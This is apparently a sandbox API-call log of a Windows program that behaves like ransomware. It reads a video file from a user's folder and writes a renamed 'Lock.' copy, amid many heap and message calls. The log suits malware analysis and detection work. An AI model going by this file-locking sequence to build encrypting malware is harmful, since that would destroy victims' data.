[0214.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0214.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0214.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0214.743] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0214.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.743] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/SuK1W_b3QKmuHjRF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\suk1w_b3qkmuhjrf.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0214.744] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.744] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0214.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0214.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0214.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.745] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0214.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0214.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0214.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0214.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0214.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0214.746] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.SuK1W_b3QKmuHjRF.swf" (normalized: "c:\\users\\fd1hvy\\videos\\lock.suk1w_b3qkmuhjrf.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0214.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0214.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0214.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0214.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0214.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0214.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0214.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0214.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e9020 [0214.751] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0214.751] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x366f, lpOverlapped=0x0) returned 1 [0214.753] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0214.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x366f) returned 0x3867020 [0214.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e9020 | out: hHeap=0x2af0000) returned 1 [0214.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0214.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0214.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0214.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0214.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0214.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0214.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0214.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x366f) returned 0x2a8a138 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x366f) returned 0x3867020 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0214.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0214.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0214.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0214.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0214.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0214.758] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0214.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0214.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x366f) returned 0x3867020 [0214.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c88 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0214.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ce8 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0214.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0214.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71bc8 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0214.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab278 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0214.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x366f) returned 0x2a8d7b0 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0214.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0214.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0214.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0214.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0214.760] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 